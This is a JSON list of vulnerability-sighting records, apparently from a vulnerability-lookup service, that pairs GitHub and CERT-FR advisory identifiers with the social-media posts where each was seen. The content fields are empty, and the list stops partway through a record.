{"uuid": "2c1f65d0-eb3d-4959-a69f-5869844cf346", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h4w2-hvcg-938j", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113703315103089292", "content": "", "creation_timestamp": "2024-12-23T17:28:21.686085Z"}, {"uuid": "1c9e86fc-5464-4dbe-88e3-9374567b5c14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5wxh-3p65-r4g6", "type": "seen", "source": "https://bsky.app/profile/tesaguri.fedibird.com.ap.brid.gy/post/3lfu7p3rttfj2", "content": "", "creation_timestamp": "2025-01-16T11:51:34.964516Z"}, {"uuid": "6ad3a92f-2e72-41b0-847f-443dcf10150f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gxh2-8jxp-m59h", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113794464484805610", "content": "", "creation_timestamp": "2025-01-08T19:48:50.554684Z"}, {"uuid": "901307b3-dc37-4953-9b48-aed28f5045b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-39h2-x6c4-6w4c", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113783511523717971", "content": "", "creation_timestamp": "2025-01-06T21:23:21.672487Z"}, {"uuid": "9d5e1396-5cc8-427e-b807-5e4c6bc6cf8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8354-6cxw-7g8c", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113804851849608369", "content": "", "creation_timestamp": "2025-01-10T15:50:29.263477Z"}, {"uuid": "84e4ea91-4808-4fb1-b856-a7010fcf6122", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-prpq-rh5h-46g9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113783511538746501", "content": "", "creation_timestamp": "2025-01-06T21:23:21.962008Z"}, {"uuid": "b9e90de5-9d50-4973-bf5b-508d1c8d3a46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v856-wjh3-4rhg", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113804851864420816", "content": "", "creation_timestamp": "2025-01-10T15:50:29.495134Z"}, {"uuid": "ae4f11fd-c019-4512-a366-94420bb73eab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rcg8-g69v-x23j", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113783537498716667", "content": "", "creation_timestamp": "2025-01-06T21:29:57.964847Z"}, {"uuid": "e68b0fdd-6fb2-46a2-81d8-efc646b2a4b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgjm-6p59-537v", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113804859730039794", "content": "", "creation_timestamp": "2025-01-10T15:52:30.171119Z"}, {"uuid": "723a7938-33ec-4be5-b334-40971ea8f6a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qmp9-xqm5-jh6m", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113726606513392791", "content": "", "creation_timestamp": "2024-12-27T20:11:40.215257Z"}, {"uuid": "257b2d44-99a9-4ec7-a4c3-1a2ea988384a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-346h-q594-rj8j", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765180178483233", "content": "", "creation_timestamp": "2025-01-03T15:41:27.505483Z"}, {"uuid": "960bbd33-446b-42f7-a225-8fe4df18c606", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7jr3-gh3w-vjxq", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765203311496444", "content": "", "creation_timestamp": "2025-01-03T15:47:20.612024Z"}, {"uuid": "f9c803ce-ae03-43fa-87f7-9b991264edc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xwx-hf68-8xq7", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765226599280497", "content": "", "creation_timestamp": "2025-01-03T15:53:18.336202Z"}, {"uuid": "eeb383ec-9f5d-45c7-b31b-d1b81a2f8a5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3w9f-fgr5-5g78", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765249621753886", "content": "", "creation_timestamp": "2025-01-03T15:59:07.193632Z"}, {"uuid": "08335f00-c634-498b-878e-e9baeb778e75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x88g-h956-m5xg", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765286956135228", "content": "", "creation_timestamp": "2025-01-03T16:08:36.957978Z"}, {"uuid": "53753f23-ea0e-42ae-9ad8-2d47751969b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mg7w-c9x2-xh7r", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765323783466999", "content": "", "creation_timestamp": "2025-01-03T16:17:58.817574Z"}, {"uuid": "44dadc0f-addf-443d-8e4e-2660070950a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cwrh-575j-8vr3", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765323798362968", "content": "", "creation_timestamp": "2025-01-03T16:17:59.060453Z"}, {"uuid": "adc67d37-aeec-41a3-bf02-57bbee0d24ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8fx8-pffw-w498", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765374408644532", "content": "", "creation_timestamp": "2025-01-03T16:30:51.286682Z"}, {"uuid": "a5074c57-45c8-4061-a4c4-eded6af8f356", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j386-3444-qgwg", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765416067424067", "content": "", "creation_timestamp": "2025-01-03T16:41:27.128795Z"}, {"uuid": "24f05206-bc07-42ac-9782-bea4c5b1e78f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jmpx-686v-c3wx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765493050087439", "content": "", "creation_timestamp": "2025-01-03T17:01:09.939021Z"}, {"uuid": "be8374d5-ef8a-4ba9-8f9f-3cbd05f8de5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c6fv-7vh8-2rhr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765525080037063", "content": "", "creation_timestamp": "2025-01-03T17:09:10.857782Z"}, {"uuid": "e9bbbd5e-ff96-4808-8b00-b8d1c6e9df39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j2xg-cjcx-4677", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765525095900326", "content": "", "creation_timestamp": "2025-01-03T17:09:11.581320Z"}, {"uuid": "fa3eee20-7abd-4ee5-ab33-9ac9e57a5527", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wv23-996v-q229", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765598049117930", "content": "", "creation_timestamp": "2025-01-03T17:27:44.639689Z"}, {"uuid": "1433beec-6afc-4ee7-b598-cd4ba61f2549", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hwcp-2h35-p66w", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765598065635457", "content": "", "creation_timestamp": "2025-01-03T17:27:45.293638Z"}, {"uuid": "37402650-4c4f-4c78-86a4-a80e5594e333", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q9jv-mm3r-j47r", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765598079911257", "content": "", "creation_timestamp": "2025-01-03T17:27:46.820343Z"}, {"uuid": "280b3686-a15b-45d5-9f66-9578a92e99c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7m27-7ghc-44w9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113766304946558973", "content": "", "creation_timestamp": "2025-01-03T20:27:31.937240Z"}, {"uuid": "ad059b7d-47ea-4e10-a08a-4a4b4fe55a47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mrx3-gxjx-hjqj", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3ley6aa6xjr2i", "content": "", "creation_timestamp": "2025-01-05T08:10:44.441763Z"}, {"uuid": "4e8285ff-7f8a-497c-9193-32ba3adc2747", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cvv5-9h9w-qp2m", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-079bc9d7-8feebf14eed3d5b1", "content": "", "creation_timestamp": "2025-01-06T09:39:21.971172Z"}, {"uuid": "0e293958-e6c8-45f3-bb3f-c1b1d45f34f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cv5r-73vf-8x7v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113782156930939692", "content": "", "creation_timestamp": "2025-01-06T15:38:52.259919Z"}, {"uuid": "3737974c-6f4b-4970-a666-89030c118a71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rf5r-q276-vrc4", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113782178626856481", "content": "", "creation_timestamp": "2025-01-06T15:44:23.551250Z"}, {"uuid": "bf2af0e2-6047-4587-90ee-712297724d49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4x6x-8rm8-c37j", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113782200387637257", "content": "", "creation_timestamp": "2025-01-06T15:49:55.496038Z"}, {"uuid": "9f4aeddd-4e63-4c28-8cf4-dfdba58e325d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pwpm-x58v-px5c", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113782380538487006", "content": "", "creation_timestamp": "2025-01-06T16:35:44.319142Z"}, {"uuid": "480b99be-c836-458f-a13b-eeb079145d6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v6jv-p6r8-j78w", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113782380555612442", "content": "", "creation_timestamp": "2025-01-06T16:35:44.609954Z"}, {"uuid": "d99e2b6c-72d6-4a37-9d18-267f9a2d5ba8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x2hr-33vp-w289", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113782530465783993", "content": "", "creation_timestamp": "2025-01-06T17:13:52.028196Z"}, {"uuid": "29e8d7aa-0ecc-4852-b0d1-4a3bb072ea9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8v-vg43-wpgf", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113795734456115143", "content": "", "creation_timestamp": "2025-01-09T01:11:48.852239Z"}, {"uuid": "25c68789-cb2c-4fbe-b252-2959dbbb36ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wp4f-qhh2-8vfv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113824831958711832", "content": "", "creation_timestamp": "2025-01-14T04:31:41.507539Z"}, {"uuid": "c187a542-68a9-437c-b0cf-eb33b806b60d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fqmf-w4xh-33rh", "type": "seen", "source": "https://gist.github.com/EliahKagan/06aa52d6ef3161c3af704e7e7c181fe8", "content": "", "creation_timestamp": "2025-01-20T05:45:01.000000Z"}, {"uuid": "68a1d38c-8359-4418-99b5-a7f0dc5016a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-001", "type": "seen", "source": "https://bsky.app/profile/ag6218ent.bsky.social/post/3lg67llxyy42s", "content": "", "creation_timestamp": "2025-01-20T11:16:09.656828Z"}, {"uuid": "8a18d8f5-7814-4199-afb8-a5f4e82aa181", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-002", "type": "seen", "source": "https://bsky.app/profile/ag6218ent.bsky.social/post/3lg6fyfd7ww2y", "content": "", "creation_timestamp": "2025-01-20T13:10:41.239108Z"}, {"uuid": "0176537e-d893-43bb-962e-b7854f8e9c45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-003", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/113861159342365050", "content": "", "creation_timestamp": "2025-01-20T14:30:14.452154Z"}, {"uuid": "6ca9c0a6-3712-408a-b196-bd028f306ec5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-003", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lg6kgnm5pz2y", "content": "", "creation_timestamp": "2025-01-20T14:30:14.463138Z"}, {"uuid": "9e111da0-2410-41bb-9874-d7bd716bda8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-003", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lg6kxyw6p22e", "content": "", "creation_timestamp": "2025-01-20T14:39:57.035389Z"}, {"uuid": "6e62d50e-d762-433c-809f-9a3a791f31f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-003", "type": "seen", "source": "https://bsky.app/profile/ag6218ent.bsky.social/post/3lg6maeipvd2z", "content": "", "creation_timestamp": "2025-01-20T15:02:31.316622Z"}, {"uuid": "63a01566-777c-431b-a6e3-db1c2dc766cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3hrw-xv8h-9499", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113861395498095406", "content": "", "creation_timestamp": "2025-01-20T15:30:16.778041Z"}, {"uuid": "0f7bdd10-5091-4fa7-a743-67c1d3eb1f67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-79xx-vf93-p7cx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113861423899231681", "content": "", "creation_timestamp": "2025-01-20T15:37:30.180312Z"}, {"uuid": "6f03191e-db8e-4fbe-8026-37fe2f330cf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fqmf-w4xh-33rh", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113861447618986432", "content": "", "creation_timestamp": "2025-01-20T15:43:32.112515Z"}, {"uuid": "037d788e-00b0-4e34-8505-3afab45d1794", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9v2v-jxvw-52rq", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113861471440807384", "content": "", "creation_timestamp": "2025-01-20T15:49:35.574629Z"}, {"uuid": "3ce96a5e-070f-4b02-9f07-a3c72792bd1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xhv4-88gx-hvgh", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113861471488726196", "content": "", "creation_timestamp": "2025-01-20T15:49:36.460922Z"}, {"uuid": "5021db3b-328c-4474-b16c-60cbcf3aa885", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h2mg-4c7q-w69v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113861471504281674", "content": "", "creation_timestamp": "2025-01-20T15:49:36.634123Z"}, {"uuid": "5afac2ad-c90a-40f4-90e9-51118396048d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-425j-h4cf-g52j", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113861495354774247", "content": "", "creation_timestamp": "2025-01-20T15:55:40.611925Z"}, {"uuid": "4c14309f-dbb0-4b41-b7bb-ece4beec87c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vg6x-rcgg-rjx6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113861495371199240", "content": "", "creation_timestamp": "2025-01-20T15:55:41.023196Z"}, {"uuid": "4cedb471-db88-4331-8e7e-1aee673f8e63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5mq-jjr3-vmx6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113861519101056622", "content": "", "creation_timestamp": "2025-01-20T16:01:42.870504Z"}, {"uuid": "57179706-b9db-4432-955d-919b2ab616cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wxmh-65f7-jcvw", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113861519101056622", "content": "", "creation_timestamp": "2025-01-20T16:01:42.899953Z"}, {"uuid": "a96f019a-d1d9-4573-bd8d-722cd906a405", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c59p-wq67-24wx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113861725489994406", "content": "", "creation_timestamp": "2025-01-20T16:54:14.076840Z"}, {"uuid": "7861ad8e-d4f0-46d3-b8b1-a272391850a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5843-2p4f-57fh", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113862035227378788", "content": "", "creation_timestamp": "2025-01-20T18:12:58.267556Z"}, {"uuid": "33efec6a-8552-458e-91cf-9f9f3393a428", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9298-4CF8-G4WJ", "type": "seen", "source": "https://t.me/brutsecurity/1052", "content": "", "creation_timestamp": "2026-07-09T03:00:12.055851Z"}, {"uuid": "ef71b3a4-2d94-4414-835c-601b6bad7bb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GV7V-RGG6-548H", "type": "seen", "source": "https://t.me/brutsecurity/1117", "content": "", "creation_timestamp": "2026-07-09T03:00:12.004676Z"}, {"uuid": "f8b554dd-6b99-48d4-80a5-113df99e0a56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f8c8-4pm7-w885", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113866997923053260", "content": "", "creation_timestamp": "2025-01-21T15:15:02.895049Z"}, {"uuid": "9fb62a50-5e9d-40ce-bf85-a7369336b997", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hmg4-wwm5-p999", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113867076129252776", "content": "", "creation_timestamp": "2025-01-21T15:34:56.303999Z"}, {"uuid": "61dff856-2e84-4c5c-a503-062fde9b5e23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wv8v-rmw2-25wc", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113867076144151551", "content": "", "creation_timestamp": "2025-01-21T15:34:56.691335Z"}, {"uuid": "17a6a183-22ce-417a-9055-a76b1b113639", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wphc-5f2j-jhvg", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113867102324757033", "content": "", "creation_timestamp": "2025-01-21T15:41:36.129673Z"}, {"uuid": "8eff5884-b437-4ca9-90ad-63422ea9fb87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w59h-3x3q-3p6j", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113867449282015793", "content": "", "creation_timestamp": "2025-01-21T17:09:50.320782Z"}, {"uuid": "8a1dc494-a2af-4458-9ce0-4368b9407641", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3jq6-xc85-m394", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113867985802521990", "content": "", "creation_timestamp": "2025-01-21T19:26:16.921819Z"}, {"uuid": "54e34030-70fa-4576-8af5-18ddee816745", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-002", "type": "seen", "source": "https://bsky.app/profile/test-cvp.bsky.social/post/3lgv4fbh6wp2k", "content": "", "creation_timestamp": "2025-01-29T13:50:09.736121Z"}, {"uuid": "2c4269c4-b6b6-4674-b8de-7efc8b99309f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-004", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lgqppoepmq2b", "content": "", "creation_timestamp": "2025-01-27T19:52:41.464248Z"}, {"uuid": "d2043abc-4723-44a5-bfab-35a705aefa50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mmg3-567w-v9j2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114258175577877862", "content": "", "creation_timestamp": "2025-03-31T17:16:40.575440Z"}, {"uuid": "559550a5-f34e-40a9-81b6-2e5b7111d893", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r57h-547h-w24f", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113942059711678817", "content": "", "creation_timestamp": "2025-02-03T21:24:15.010171Z"}, {"uuid": "28dabe2c-76c7-4770-a0b8-c24635cea43f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j82m-pc2v-2484", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113958119425687178", "content": "", "creation_timestamp": "2025-02-06T17:28:26.786055Z"}, {"uuid": "fcd14d54-454e-4cc9-8c0d-5db7e5bcb4c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2018-ALE-013", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvf7w6mos2o", "content": "", "creation_timestamp": "2025-01-29T16:28:13.892826Z"}, {"uuid": "779ad664-3f82-4d52-a127-99422160c33b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22qq-3xwm-r5x4", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113942059726528144", "content": "", "creation_timestamp": "2025-02-03T21:24:15.221626Z"}, {"uuid": "c5d6d59b-f756-4e1a-aa04-6eddc2ab9005", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2019-ALE-001", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfah2evn2y", "content": "", "creation_timestamp": "2025-01-29T16:28:31.590650Z"}, {"uuid": "87045961-77d6-48e4-8c57-2ead3d5e67ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f34g-wc2m-mf76", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113942086547212939", "content": "", "creation_timestamp": "2025-02-03T21:31:04.586692Z"}, {"uuid": "4574fbc7-d0a7-447b-961e-b7d52884d31f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2019-ALE-002", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfavihmf22", "content": "", "creation_timestamp": "2025-01-29T16:28:47.190593Z"}, {"uuid": "9463ba25-7131-490b-9df4-aa8d70195c44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", 